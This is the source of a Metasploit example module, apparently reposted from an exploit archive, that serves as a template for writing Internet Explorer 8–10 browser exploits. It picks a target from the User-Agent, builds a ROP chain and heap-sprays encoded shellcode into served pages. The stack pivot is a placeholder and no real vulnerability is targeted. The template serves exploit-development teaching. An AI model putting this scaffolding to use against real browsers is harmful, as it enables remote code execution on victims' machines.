Windows Browser Example Exploit

This template covers IE8/9/10, and uses the user-agent HTTP header to detect the browser version. Please note IE8 and newer may emulate an older IE version in compatibility mode, in that case the module won't be able to detect the browser correctly. This is an example Metasploit module to be used for exploit development.


MD5 | faa8b809be83a6b1aea60f69ecb52ffc

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

###
#
# This exploit sample demonstrates how a typical browser exploit is written using commonly
# used components such as: HttpServer, BrowserAutopwn, RopDB, DOM Element Property Spray.
#
###
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
include Msf::Exploit::Remote::BrowserAutopwn

# Set :classid and :method for ActiveX exploits. For example:
# :classid => "{C3B92104-B5A7-11D0-A37F-00A0248F0AF1}",
# :method => "SetShapeNodeType",
autopwn_info({
:ua_name => HttpClients::IE,
:ua_minver => "8.0",
:ua_maxver => "10.0",
:javascript => true,
:os_name => OperatingSystems::Match::WINDOWS,
:rank => NormalRanking
})

def initialize(info={})
super(update_info(info,
'Name' => "Module Name",
'Description' => %q{
This template covers IE8/9/10, and uses the user-agent HTTP header to detect
the browser version. Please note IE8 and newer may emulate an older IE version
in compatibility mode, in that case the module won't be able to detect the
browser correctly.
},
'License' => MSF_LICENSE,
'Author' => [ 'sinn3r' ],
'References' =>
[
[ 'URL', 'http://metasploit.com' ]
],
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', {} ],
[ 'IE 8 on Windows XP SP3', { 'Rop' => :jre } ],
[ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],
[ 'IE 8 on Windows 7', { 'Rop' => :jre } ],
[ 'IE 9 on Windows 7', { 'Rop' => :jre } ],
[ 'IE 10 on Windows 8', { 'Rop' => :jre } ]
],
'Payload' =>
{
'BadChars' => "\x00", # js_property_spray
'StackAdjustment' => -3500
},
'Privileged' => false,
'DisclosureDate' => "Apr 1 2013",
'DefaultTarget' => 0))
end

def get_target(agent)
return target if target.name != 'Automatic'

nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
ie = agent.scan(/MSIE (\d)/).flatten[0] || ''

ie_name = "IE #{ie}"

case nt
when '5.1'
os_name = 'Windows XP SP3'
when '6.0'
os_name = 'Windows Vista'
when '6.1'
os_name = 'Windows 7'
when '6.2'
os_name = 'Windows 8'
when '6.3'
os_name = 'Windows 8.1'
end

targets.each do |t|
if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
return t
end
end

nil
end

def get_payload(t)
stack_pivot = "\x41\x42\x43\x44"
code = payload.encoded

case t['Rop']
when :msvcrt
print_status("Using msvcrt ROP")
rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})

else
print_status("Using JRE ROP")
rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
end

rop_payload
end


def get_html(t)
js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch))
html = %Q|
<script>
#{js_property_spray}

var s = unescape("#{js_p}");
sprayHeap({shellcode:s});
</script>
|

html.gsub(/^\t\t/, '')
end


def on_request_uri(cli, request)
agent = request.headers['User-Agent']
print_status("Requesting: #{request.uri}")

target = get_target(agent)
if target.nil?
print_error("Browser not supported, sending 404: #{agent}")
send_not_found(cli)
return
end

print_status("Target selected as: #{target.name}")
html = get_html(target)
send_response(cli, html, { 'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache' })
end
end

Related Posts